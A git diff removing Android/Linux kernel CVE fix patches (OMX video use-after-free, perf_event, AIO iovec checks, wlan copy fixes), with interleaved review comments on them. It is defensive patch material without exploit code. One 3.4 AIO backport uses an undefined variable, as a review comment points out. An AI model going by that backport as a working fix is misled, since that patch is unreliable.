- - #ifdef _ANDROID_ - #include -+#include - - enum { - PRIO_ERROR=0x1, -@@ -75,4 +76,17 @@ extern int debug_level; - } \ - } \ - -+class auto_lock { -+ public: -+ auto_lock(pthread_mutex_t &lock) -+ : mLock(lock) { -+ pthread_mutex_lock(&mLock); -+ } -+ ~auto_lock() { -+ pthread_mutex_unlock(&mLock); -+ } -+ private: -+ pthread_mutex_t &mLock; -+}; -+ - #endif -diff --git a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h -index 2df1b6e..616b8c2 100644 ---- a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h -+++ b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h -@@ -772,6 +772,7 @@ class omx_vdec: public qc_omx_component - //************************************************************* - pthread_mutex_t m_lock; - pthread_mutex_t c_lock; -+ pthread_mutex_t buf_lock; - //sem to handle the minimum procesing of commands - sem_t m_cmd_lock; - sem_t m_safe_flush; -diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp -index 646f211..f490fad 100644 ---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp -+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp -@@ -685,6 +685,7 @@ omx_vdec::omx_vdec(): m_error_propogated(false), - m_vendor_config.pData = NULL; - pthread_mutex_init(&m_lock, NULL); - pthread_mutex_init(&c_lock, NULL); -+ pthread_mutex_init(&buf_lock, NULL); - sem_init(&m_cmd_lock,0,0); - sem_init(&m_safe_flush, 0, 0); - streaming[CAPTURE_PORT] = -@@ -812,6 +813,7 @@ omx_vdec::~omx_vdec() - close(drv_ctx.video_driver_fd); - pthread_mutex_destroy(&m_lock); - pthread_mutex_destroy(&c_lock); -+ pthread_mutex_destroy(&buf_lock); - sem_destroy(&m_cmd_lock); - if (perf_flag) { - DEBUG_PRINT_HIGH("--> TOTAL PROCESSING TIME"); -@@ -5041,6 +5043,9 @@ OMX_ERRORTYPE omx_vdec::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr) - index = bufferHdr - m_inp_mem_ptr; - DEBUG_PRINT_LOW("Free Input Buffer index = %d",index); - -+ auto_lock l(buf_lock); -+ bufferHdr->pInputPortPrivate = NULL; -+ - if (index 
< drv_ctx.ip_buf.actualcount && drv_ctx.ptr_inputbuffer) { - DEBUG_PRINT_LOW("Free Input Buffer index = %d",index); - if (drv_ctx.ptr_inputbuffer[index].pmem_fd > 0) { -@@ -5985,7 +5990,9 @@ OMX_ERRORTYPE omx_vdec::empty_this_buffer(OMX_IN OMX_HANDLETYPE hComp, - OMX_ERRORTYPE ret1 = OMX_ErrorNone; - unsigned int nBufferIndex = drv_ctx.ip_buf.actualcount; - -- if (m_state == OMX_StateInvalid) { -+ if (m_state != OMX_StateExecuting && -+ m_state != OMX_StatePause && -+ m_state != OMX_StateIdle) { - DEBUG_PRINT_ERROR("Empty this buffer in Invalid State"); - return OMX_ErrorInvalidState; - } -@@ -6136,9 +6143,10 @@ OMX_ERRORTYPE omx_vdec::empty_this_buffer_proxy(OMX_IN OMX_HANDLETYPE hComp, - return OMX_ErrorNone; - } - -+ auto_lock l(buf_lock); - temp_buffer = (struct vdec_bufferpayload *)buffer->pInputPortPrivate; - -- if ((temp_buffer - drv_ctx.ptr_inputbuffer) > (int)drv_ctx.ip_buf.actualcount) { -+ if (!temp_buffer || (temp_buffer - drv_ctx.ptr_inputbuffer) > (int)drv_ctx.ip_buf.actualcount) { - return OMX_ErrorBadParameter; - } - /* If its first frame, H264 codec and reject is true, then parse the nal -@@ -6164,7 +6172,7 @@ OMX_ERRORTYPE omx_vdec::empty_this_buffer_proxy(OMX_IN OMX_HANDLETYPE hComp, - /*for use buffer we need to memcpy the data*/ - temp_buffer->buffer_len = buffer->nFilledLen; - -- if (input_use_buffer) { -+ if (input_use_buffer && temp_buffer->bufferaddr) { - if (buffer->nFilledLen <= temp_buffer->buffer_len) { - if (arbitrary_bytes) { - memcpy (temp_buffer->bufferaddr, (buffer->pBuffer + buffer->nOffset),buffer->nFilledLen); -@@ -6340,6 +6348,18 @@ if (buffer->nFlags & QOMX_VIDEO_BUFFERFLAG_EOSEQ) { - OMX_ERRORTYPE omx_vdec::fill_this_buffer(OMX_IN OMX_HANDLETYPE hComp, - OMX_IN OMX_BUFFERHEADERTYPE* buffer) - { -+ if (m_state != OMX_StateExecuting && -+ m_state != OMX_StatePause && -+ m_state != OMX_StateIdle) { -+ DEBUG_PRINT_ERROR("FTB in Invalid State"); -+ return OMX_ErrorInvalidState; -+ } -+ -+ if (!m_out_bEnabled) { -+ 
DEBUG_PRINT_ERROR("ERROR:FTB incorrect state operation, output port is disabled."); -+ return OMX_ErrorIncorrectStateOperation; -+ } -+ - unsigned nPortIndex = 0; - if (dynamic_buf_mode) { - private_handle_t *handle = NULL; -@@ -6376,12 +6396,6 @@ OMX_ERRORTYPE omx_vdec::fill_this_buffer(OMX_IN OMX_HANDLETYPE hComp, - buffer->nAllocLen = handle->size; - } - -- -- if (m_state == OMX_StateInvalid) { -- DEBUG_PRINT_ERROR("FTB in Invalid State"); -- return OMX_ErrorInvalidState; -- } -- - if (!m_out_bEnabled) { - DEBUG_PRINT_ERROR("ERROR:FTB incorrect state operation, output port is disabled."); - return OMX_ErrorIncorrectStateOperation; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3747/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3747/ANY/0001.patch deleted file mode 100644 index 8b429546..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3747/ANY/0001.patch +++ /dev/null 
@@ -1,91 +0,0 @@ -From 905826825e4459c0dfc9d6475e950d6be3a16fc7 Mon Sep 17 00:00:00 2001 -From: Praveen Chavan -Date: Mon, 25 Apr 2016 11:51:05 -0700 -Subject: mm-video-v4l2: venc: Avoid processing ETBs/FTBs in invalid states - -(per the spec) ETB/FTB should not be handled in states other than -Executing, Paused and Idle. This avoids accessing invalid buffers. -Also add a lock to protect the private-buffers from being deleted -while accessing from another thread. - -Bug: 27903498 -Security Vulnerability - Heap Use-After-Free and Possible LPE in -MediaServer (libOmxVenc problem #3) - -CRs-Fixed: 1010088 - -Change-Id: I898b42034c0add621d4f9d8e02ca0ed4403d4fd3 ---- - mm-video-v4l2/vidc/venc/src/omx_video_base.cpp | 20 ++++++++++++++++---- - 1 file changed, 16 insertions(+), 4 deletions(-) - -diff --git a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp -index a481872..df30748 100644 ---- a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp -+++ b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp -@@ -2561,6 +2561,8 @@ OMX_ERRORTYPE omx_video::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr) - } - - if (index < m_sInPortDef.nBufferCountActual && m_pInput_pmem) { -+ auto_lock l(m_lock); -+ - if (m_pInput_pmem[index].fd > 0 && input_use_buffer == false) { - DEBUG_PRINT_LOW("FreeBuffer:: i/p AllocateBuffer case"); - if(!secure_session) { -@@ -2568,6 +2570,7 @@ OMX_ERRORTYPE omx_video::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr) - } else { - free(m_pInput_pmem[index].buffer); - } -+ m_pInput_pmem[index].buffer = NULL; - close (m_pInput_pmem[index].fd); - #ifdef USE_ION - free_ion_memory(&m_pInput_ion[index]); -@@ -2581,6 +2584,7 @@ OMX_ERRORTYPE omx_video::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr) - } - if(!secure_session) { - munmap (m_pInput_pmem[index].buffer,m_pInput_pmem[index].size); -+ m_pInput_pmem[index].buffer = NULL; - } - close (m_pInput_pmem[index].fd); - #ifdef USE_ION -@@ -3296,7 +3300,9 @@ 
OMX_ERRORTYPE omx_video::empty_this_buffer(OMX_IN OMX_HANDLETYPE hComp, - unsigned int nBufferIndex ; - - DEBUG_PRINT_LOW("ETB: buffer = %p, buffer->pBuffer[%p]", buffer, buffer->pBuffer); -- if (m_state == OMX_StateInvalid) { -+ if (m_state != OMX_StateExecuting && -+ m_state != OMX_StatePause && -+ m_state != OMX_StateIdle) { - DEBUG_PRINT_ERROR("ERROR: Empty this buffer in Invalid State"); - return OMX_ErrorInvalidState; - } -@@ -3459,9 +3465,13 @@ OMX_ERRORTYPE omx_video::empty_this_buffer_proxy(OMX_IN OMX_HANDLETYPE hComp, - #endif - { - DEBUG_PRINT_LOW("Heap UseBuffer case, so memcpy the data"); -+ -+ auto_lock l(m_lock); - pmem_data_buf = (OMX_U8 *)m_pInput_pmem[nBufIndex].buffer; -- memcpy (pmem_data_buf, (buffer->pBuffer + buffer->nOffset), -- buffer->nFilledLen); -+ if (pmem_data_buf) { -+ memcpy (pmem_data_buf, (buffer->pBuffer + buffer->nOffset), -+ buffer->nFilledLen); -+ } - DEBUG_PRINT_LOW("memcpy() done in ETBProxy for i/p Heap UseBuf"); - } else if (mUseProxyColorFormat) { - // Gralloc-source buffers with color-conversion -@@ -3520,7 +3530,9 @@ OMX_ERRORTYPE omx_video::fill_this_buffer(OMX_IN OMX_HANDLETYPE hComp, - OMX_IN OMX_BUFFERHEADERTYPE* buffer) - { - DEBUG_PRINT_LOW("FTB: buffer->pBuffer[%p]", buffer->pBuffer); -- if (m_state == OMX_StateInvalid) { -+ if (m_state != OMX_StateExecuting && -+ m_state != OMX_StatePause && -+ m_state != OMX_StateIdle) { - DEBUG_PRINT_ERROR("ERROR: FTB in Invalid State"); - return OMX_ErrorInvalidState; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3768/ANY/0001.patch deleted file mode 100644 index 5e0db56f..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0001.patch +++ /dev/null 
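Review bot: In the `empty_this_buffer_proxy` hunk of omx_video_base.cpp (the CVE-2016-3747 patch), a NULL `pmem_data_buf` only skips the `memcpy`; the function then carries on and the "memcpy() done" log line still runs. A buffer whose backing memory `free_input_buffer` has already released and nulled therefore appears to be processed as if its payload had been copied. Failing the call in that branch would surface the race to the client, for example `if (!pmem_data_buf) return OMX_ErrorBadParameter;` placed before the copy. Whether the buffer must first be handed back to the client on that path cannot be seen here, because the function body continues outside the hunk. The widened `m_state` tests in `empty_this_buffer` and `fill_this_buffer` also keep the old "Invalid State" log text, although they now reject other states as well.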
@@ -1,90 +0,0 @@ -From d75be03af111fb5a31eba82f665242e6d8b07008 Mon Sep 17 00:00:00 2001 -From: Arun KS -Date: Wed, 11 May 2016 10:11:36 +0530 -Subject: msm: perf: Do not allocate new hw_event if event is duplicate. - -During a perf_event_enable, kernel/events/core.c calls pmu->add() which -is platform implementation(arch/arm/kernel/perf_event.c). Due to the -duplicate constraints, arch/arm/mach-msm/perf_event_msm_krait_l2.c -drivers marks the event as OFF but returns TRUE to perf_event.c which -goes ahead and allocates the hw_event and enables it. - -Since event is marked OFF, kernel events core will try to enable this event -again during next perf_event_enable. Which results in same event enabled -on multiple hw_events. But during the perf_release, event struct is freed -and only one hw_event is released. This results in dereferencing the -invalid pointer and hence the crash. - -Fix this by returning error in case of constraint event duplicate. Hence -avoiding the same event programmed on multiple hw event counters. 
- -Change-Id: Ia3360be027dfe87ac753191ffe7e0bc947e72455 -Signed-off-by: Arun KS ---- - arch/arm/kernel/perf_event.c | 1 + - arch/arm/mach-msm/perf_event_msm_krait_l2.c | 1 + - arch/arm/mach-msm/perf_event_msm_l2.c | 4 +++- - kernel/events/core.c | 7 ------- - 4 files changed, 5 insertions(+), 8 deletions(-) - -diff --git a/arch/arm/kernel/perf_event.c b/arch/arm/kernel/perf_event.c -index 1541a80..a1264ac 100644 ---- a/arch/arm/kernel/perf_event.c -+++ b/arch/arm/kernel/perf_event.c -@@ -308,6 +308,7 @@ armpmu_add(struct perf_event *event, int flags) - pr_err("Event: %llx failed constraint check.\n", - event->attr.config); - event->state = PERF_EVENT_STATE_OFF; -+ err = -EPERM; - goto out; - } - -diff --git a/arch/arm/mach-msm/perf_event_msm_krait_l2.c b/arch/arm/mach-msm/perf_event_msm_krait_l2.c -index d816794..57f82d0 100644 ---- a/arch/arm/mach-msm/perf_event_msm_krait_l2.c -+++ b/arch/arm/mach-msm/perf_event_msm_krait_l2.c -@@ -463,6 +463,7 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event) - if (!(event->cpu < 0)) { - event->state = PERF_EVENT_STATE_OFF; - event->attr.constraint_duplicate = 1; -+ err = -EPERM; - } - } - out: -diff --git a/arch/arm/mach-msm/perf_event_msm_l2.c b/arch/arm/mach-msm/perf_event_msm_l2.c -index f78487a..93695e2 100644 ---- a/arch/arm/mach-msm/perf_event_msm_l2.c -+++ b/arch/arm/mach-msm/perf_event_msm_l2.c -@@ -836,8 +836,10 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event) - * This sets the event OFF on all but one - * CPU. 
- */ -- if (!(event->cpu < 0)) -+ if (!(event->cpu < 0)) { - event->state = PERF_EVENT_STATE_OFF; -+ err = -EPERM; -+ } - } - - out: -diff --git a/kernel/events/core.c b/kernel/events/core.c -index 33ad70a..7ebe09a 100644 ---- a/kernel/events/core.c -+++ b/kernel/events/core.c -@@ -3030,13 +3030,6 @@ static void put_event(struct perf_event *event) - - if (!atomic_long_dec_and_test(&event->refcount)) - return; -- /* -- * Event can be in state OFF because of a constraint check. -- * Change to ACTIVE so that it gets cleaned up correctly. -- */ -- if ((event->state == PERF_EVENT_STATE_OFF) && -- event->attr.constraint_duplicate) -- event->state = PERF_EVENT_STATE_ACTIVE; - - rcu_read_lock(); - owner = ACCESS_ONCE(event->owner); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3768/ANY/0002.patch deleted file mode 100644 index 10ad536a..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0002.patch +++ /dev/null 
@@ -1,52 +0,0 @@ -From 84d8c81420aaa7c6cd6f57cb52daccf07b1f7a50 Mon Sep 17 00:00:00 2001 -From: Veena Sambasivan -Date: Thu, 19 May 2016 18:47:15 -0700 -Subject: [PATCH] msm: perf: Do not allocate new hw_event if event is - duplicate. - -During a perf_event_enable, kernel/events/core.c calls pmu->add() which -is platform implementation(arch/arm/kernel/perf_event.c). Due to the -duplicate constraints, arch/arm/mach-msm/perf_event_msm_krait_l2.c -drivers marks the event as OFF but returns TRUE to perf_event.c which -goes ahead and allocates the hw_event and enables it. -Since event is marked OFF, kernel events core will try to enable this event -again during next perf_event_enable. Which results in same event enabled -on multiple hw_events. But during the perf_release, event struct is freed -and only one hw_event is released. This results in dereferencing the -invalid pointer and hence the crash. -Fix this by returning error in case of constraint event duplicate. Hence -avoiding the same event programmed on multiple hw event counters. 
- -bug: 28172137 -Change-Id: Ia3360be027dfe87ac753191ffe7e0bc947e72455 -Signed-off-by: Arun KS -Signed-off-by: Veena Sambasivan ---- - arch/arm/kernel/perf_event.c | 1 + - arch/arm/mach-msm/perf_event_msm_krait_l2.c | 1 + - 2 files changed, 2 insertions(+) - -diff --git a/arch/arm/kernel/perf_event.c b/arch/arm/kernel/perf_event.c -index 0f288a7c035f9..a0c1e318a7905 100644 ---- a/arch/arm/kernel/perf_event.c -+++ b/arch/arm/kernel/perf_event.c -@@ -240,6 +240,7 @@ armpmu_add(struct perf_event *event, int flags) - pr_err("Event: %llx failed constraint check.\n", - event->attr.config); - event->state = PERF_EVENT_STATE_OFF; -+ err = -EPERM; - goto out; - } - -diff --git a/arch/arm/mach-msm/perf_event_msm_krait_l2.c b/arch/arm/mach-msm/perf_event_msm_krait_l2.c -index 65a5d2f8e1bcd..cc39b719b33fb 100644 ---- a/arch/arm/mach-msm/perf_event_msm_krait_l2.c -+++ b/arch/arm/mach-msm/perf_event_msm_krait_l2.c -@@ -468,6 +468,7 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event) - if (!(event->cpu < 0)) { - event->state = PERF_EVENT_STATE_OFF; - event->attr.constraint_duplicate = 1; -+ err = -EPERM; - } - } - out: diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.10/0003.patch deleted file mode 100644 index e72588b7..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3775/3.10/0003.patch +++ /dev/null 
@@ -1,53 +0,0 @@ -From 8096090858689395a75bbf696ff8276c3c236b98 Mon Sep 17 00:00:00 2001 -From: Greg Kroah-Hartman -Date: Thu, 25 Feb 2016 12:15:48 -0800 -Subject: [PATCH] AIO: properly check iovec sizes - -commit ff19ac8fb71e8a2bf07d61b959062998139c1104 upstream - -In Linus's tree, the iovec code has been reworked massively, but in -older kernels the AIO layer should be checking this before passing the -request on to other layers. - -Many thanks to Ben Hawkes of Google Project Zero for pointing out the -issue. - -Bug: 28588279 - -Reported-by: Ben Hawkes -Acked-by: Benjamin LaHaise -Tested-by: Willy Tarreau -[backported to 3.10 - willy] -Signed-off-by: Greg Kroah-Hartman -Signed-off-by: Greg Kroah-Hartman - -Change-Id: If539a08b42dd51a473b3f3743f9497e637266a05 ---- - fs/aio.c | 11 ++++++++--- - 1 file changed, 8 insertions(+), 3 deletions(-) - -diff --git a/fs/aio.c b/fs/aio.c -index ded94c4fa30d3..9798d4edfd8f2 100644 ---- a/fs/aio.c -+++ b/fs/aio.c -@@ -977,12 +977,17 @@ static ssize_t aio_setup_vectored_rw(int rw, struct kiocb *kiocb, bool compat) - - static ssize_t aio_setup_single_vector(int rw, struct kiocb *kiocb) - { -- if (unlikely(!access_ok(!rw, kiocb->ki_buf, kiocb->ki_nbytes))) -- return -EFAULT; -+ size_t len = kiocb->ki_nbytes; -+ -+ if (len > MAX_RW_COUNT) -+ len = MAX_RW_COUNT; -+ -+ if (unlikely(!access_ok(!rw, kiocb->ki_buf, len))) -+ return -EFAULT; - - kiocb->ki_iovec = &kiocb->ki_inline_vec; - kiocb->ki_iovec->iov_base = kiocb->ki_buf; -- kiocb->ki_iovec->iov_len = kiocb->ki_nbytes; -+ kiocb->ki_iovec->iov_len = len; - kiocb->ki_nr_segs = 1; - return 0; - } diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.18/0004.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.18/0004.patch deleted file mode 100644 index 28901d3d..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3775/3.18/0004.patch +++ /dev/null 
@@ -1,48 +0,0 @@ -From b1568c363c54fa3aa98b1cfa7c535115950bec0c Mon Sep 17 00:00:00 2001 -From: Greg Kroah-Hartman -Date: Fri, 19 Feb 2016 17:36:21 -0800 -Subject: [PATCH] BACKPORT: AIO: properly check iovec sizes - -In Linus's tree, the iovec code has been reworked massively, but in -older kernels the AIO layer should be checking this before passing the -request on to other layers. - -Many thanks to Ben Hawkes of Google Project Zero for pointing out the -issue. - -Reported-by: Ben Hawkes -Acked-by: Benjamin LaHaise -Tested-by: Willy Tarreau -[backported to 3.10 - willy] -Signed-off-by: Greg Kroah-Hartman - -(cherry picked from commit ff19ac8fb71e8a2bf07d61b959062998139c1104) -Change-Id: I3150b93cf125b03add473dfded89757531b4eb13 -Signed-off-by: Thierry Strudel ---- - fs/aio.c | 9 +++++++-- - 1 file changed, 7 insertions(+), 2 deletions(-) - -diff --git a/fs/aio.c b/fs/aio.c -index 58caa7e5d81c6..d9912555aacc8 100644 ---- a/fs/aio.c -+++ b/fs/aio.c -@@ -1354,11 +1354,16 @@ static ssize_t aio_setup_single_vector(struct kiocb *kiocb, - unsigned long *nr_segs, - struct iovec *iovec) - { -- if (unlikely(!access_ok(!rw, buf, kiocb->ki_nbytes))) -+ size_t len = kiocb->ki_nbytes; -+ -+ if (len > MAX_RW_COUNT) -+ len = MAX_RW_COUNT; -+ -+ if (unlikely(!access_ok(!rw, buf, len))) - return -EFAULT; - - iovec->iov_base = buf; -- iovec->iov_len = kiocb->ki_nbytes; -+ iovec->iov_len = len; - *nr_segs = 1; - return 0; - } diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.4/0001.patch deleted file mode 100644 index d707f1d2..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0001.patch +++ /dev/null 
@@ -1,108 +0,0 @@ -From dc18eac80caaa12ff7072df9fe857b921e8c26c7 Mon Sep 17 00:00:00 2001 -From: Linus Torvalds -Date: Mon, 21 May 2012 16:06:20 -0700 -Subject: [PATCH] UPSTREAM: vfs: make AIO use the proper rw_verify_area() area - helpers - -We had for some reason overlooked the AIO interface, and it didn't use -the proper rw_verify_area() helper function that checks (for example) -mandatory locking on the file, and that the size of the access doesn't -cause us to overflow the provided offset limits etc. - -Instead, AIO did just the security_file_permission() thing (that -rw_verify_area() also does) directly. - -This fixes it to do all the proper helper functions, which not only -means that now mandatory file locking works with AIO too, we can -actually remove lines of code. - -Bug: 28939037 -Reported-by: Manish Honap -Cc: stable@vger.kernel.org -Signed-off-by: Linus Torvalds -(cherry picked from commit a70b52ec1aaeaf60f4739edb1b422827cb6f3893) - -Change-Id: I2e182e973b44ba97c45c80d52d8a0b7c32a72750 ---- - fs/aio.c | 30 ++++++++++++++---------------- - 1 file changed, 14 insertions(+), 16 deletions(-) - -diff --git a/fs/aio.c b/fs/aio.c -index 67a6db3e1b6f8..e7f2fad7b4ce7 100644 ---- a/fs/aio.c -+++ b/fs/aio.c -@@ -1456,6 +1456,10 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat) - if (ret < 0) - goto out; - -+ ret = rw_verify_area(type, kiocb->ki_filp, &kiocb->ki_pos, ret); -+ if (ret < 0) -+ goto out; -+ - kiocb->ki_nr_segs = kiocb->ki_nbytes; - kiocb->ki_cur_seg = 0; - /* ki_nbytes/left now reflect bytes instead of segs */ -@@ -1467,11 +1471,17 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat) - return ret; - } - --static ssize_t aio_setup_single_vector(struct kiocb *kiocb) -+static ssize_t aio_setup_single_vector(int type, struct file * file, struct kiocb *kiocb) - { -+ int bytes; -+ -+ bytes = rw_verify_area(type, file, &kiocb->ki_pos, kiocb->ki_left); -+ if (bytes < 0) -+ return bytes; -+ - 
kiocb->ki_iovec = &kiocb->ki_inline_vec; - kiocb->ki_iovec->iov_base = kiocb->ki_buf; -- kiocb->ki_iovec->iov_len = kiocb->ki_left; -+ kiocb->ki_iovec->iov_len = bytes; - kiocb->ki_nr_segs = 1; - kiocb->ki_cur_seg = 0; - return 0; -@@ -1496,10 +1506,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat) - if (unlikely(!access_ok(VERIFY_WRITE, kiocb->ki_buf, - kiocb->ki_left))) - break; -- ret = security_file_permission(file, MAY_READ); -- if (unlikely(ret)) -- break; -- ret = aio_setup_single_vector(kiocb); -+ ret = aio_setup_single_vector(READ, file, kiocb); - if (ret) - break; - ret = -EINVAL; -@@ -1514,10 +1521,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat) - if (unlikely(!access_ok(VERIFY_READ, kiocb->ki_buf, - kiocb->ki_left))) - break; -- ret = security_file_permission(file, MAY_WRITE); -- if (unlikely(ret)) -- break; -- ret = aio_setup_single_vector(kiocb); -+ ret = aio_setup_single_vector(WRITE, file, kiocb); - if (ret) - break; - ret = -EINVAL; -@@ -1528,9 +1532,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat) - ret = -EBADF; - if (unlikely(!(file->f_mode & FMODE_READ))) - break; -- ret = security_file_permission(file, MAY_READ); -- if (unlikely(ret)) -- break; - ret = aio_setup_vectored_rw(READ, kiocb, compat); - if (ret) - break; -@@ -1542,9 +1543,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat) - ret = -EBADF; - if (unlikely(!(file->f_mode & FMODE_WRITE))) - break; -- ret = security_file_permission(file, MAY_WRITE); -- if (unlikely(ret)) -- break; - ret = aio_setup_vectored_rw(WRITE, kiocb, compat); - if (ret) - break; diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch deleted file mode 100644 index d9a40c49..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch +++ /dev/null 
@@ -1,53 +0,0 @@ -From 6ad77af2e7791e8afd85feef1567aaaab9a748dc Mon Sep 17 00:00:00 2001 -From: Greg Kroah-Hartman -Date: Thu, 25 Feb 2016 12:15:48 -0800 -Subject: [PATCH] AIO: properly check iovec sizes - -commit ff19ac8fb71e8a2bf07d61b959062998139c1104 upstream - -In Linus's tree, the iovec code has been reworked massively, but in -older kernels the AIO layer should be checking this before passing the -request on to other layers. - -Many thanks to Ben Hawkes of Google Project Zero for pointing out the -issue. - -Bug: 28588279 - -Backported from 3.10 : Cyanogen -Conflicts: - fs/aio.c - -Reported-by: Ben Hawkes -Acked-by: Benjamin LaHaise -Tested-by: Willy Tarreau -[backported to 3.10 - willy] -Signed-off-by: Greg Kroah-Hartman -Signed-off-by: Greg Kroah-Hartman - -Change-Id: Id11bb629bd6afaf09b9db5a944e2d060972bc0f1 ---- - -diff --git a/fs/aio.c b/fs/aio.c -index 67a6db3..70a611f 100644 ---- a/fs/aio.c -+++ b/fs/aio.c -@@ -1469,9 +1469,17 @@ - - static ssize_t aio_setup_single_vector(struct kiocb *kiocb) - { -+ size_t len = kiocb->ki_nbytes; -+ -+ if (len > MAX_RW_COUNT) -+ len = MAX_RW_COUNT; -+ -+ if (unlikely(!access_ok(!rw, kiocb->ki_buf, len))) -+ return -EFAULT; -+ - kiocb->ki_iovec = &kiocb->ki_inline_vec; - kiocb->ki_iovec->iov_base = kiocb->ki_buf; -- kiocb->ki_iovec->iov_len = kiocb->ki_left; -+ kiocb->ki_iovec->iov_len = len; - kiocb->ki_nr_segs = 1; - kiocb->ki_cur_seg = 0; - return 0; diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch.base64 deleted file mode 100644 index d152a37c..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-3792/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3792/ANY/0001.patch deleted file mode 100644 index d556ad88..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3792/ANY/0001.patch +++ /dev/null 
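Review bot: The added `access_ok(!rw, kiocb->ki_buf, len)` in the 3.4 backport (CVE-2016-3775/3.4/0002.patch) uses `rw`, but the context line shows `aio_setup_single_vector(struct kiocb *kiocb)` with no such parameter, so unless `rw` is defined elsewhere in fs/aio.c this version does not build. The 3.10 patch on this page has `int rw` in the signature, which is presumably where the line was copied from. On a tree with the one-argument signature the clamp alone carries the fix, `if (len > MAX_RW_COUNT) len = MAX_RW_COUNT;` followed by `kiocb->ki_iovec->iov_len = len;`, provided the caller still performs its own `access_ok`, as the context lines of 3.4/0001.patch suggest. That patch and this one both start from blob `67a6db3` and rewrite the same function differently, so they cannot both be applied as written.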
@@ -1,336 +0,0 @@ -From 28d4f0c1f712bffb4aa5b47f06e97d5a9fa06d29 Mon Sep 17 00:00:00 2001 -From: Arif Hussain -Date: Sun, 27 Oct 2013 23:01:14 -0700 -Subject: wlan: Userspace data copy fix - -Use copy_to_user and copy_from_user for -copying data to/from user space. - -Change-Id: I07ed5361b439f4bcd61bbf693cc17c950f5b2660 -CRs-Fixed: 561022 ---- - CORE/HDD/inc/wlan_hdd_main.h | 1 + - CORE/HDD/src/wlan_hdd_hostapd.c | 160 ++++++++++++++++++++++++++++++---------- - 2 files changed, 124 insertions(+), 37 deletions(-) - -diff --git a/CORE/HDD/inc/wlan_hdd_main.h b/CORE/HDD/inc/wlan_hdd_main.h -index 57b2ec0..e3fcca4 100644 ---- a/CORE/HDD/inc/wlan_hdd_main.h -+++ b/CORE/HDD/inc/wlan_hdd_main.h -@@ -153,6 +153,7 @@ - #define MAC_ADDR_ARRAY(a) (a)[0], (a)[1], (a)[2], (a)[3], (a)[4], (a)[5] - /** Mac Address string **/ - #define MAC_ADDRESS_STR "%02x:%02x:%02x:%02x:%02x:%02x" -+#define MAC_ADDRESS_STR_LEN 18 /* Including null terminator */ - #define MAX_GENIE_LEN 255 - - #define WLAN_CHIP_VERSION "WCNSS" -diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c -index a5d696e..a155932 100644 ---- a/CORE/HDD/src/wlan_hdd_hostapd.c -+++ b/CORE/HDD/src/wlan_hdd_hostapd.c -@@ -1418,12 +1418,13 @@ static iw_softap_getassoc_stamacaddr(struct net_device *dev, - union iwreq_data *wrqu, char *extra) - { - hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev)); -- unsigned char *pmaclist; -+ unsigned int maclist_index; - hdd_station_info_t *pStaInfo = pHostapdAdapter->aStaInfo; -+ char maclist_null = '\0'; - int cnt = 0, len; - - -- pmaclist = wrqu->data.pointer + sizeof(unsigned long int); -+ maclist_index = sizeof(unsigned long int); - len = wrqu->data.length; - - spin_lock_bh( &pHostapdAdapter->staInfo_lock ); -@@ -1431,8 +1432,13 @@ static iw_softap_getassoc_stamacaddr(struct net_device *dev, - if (TRUE == 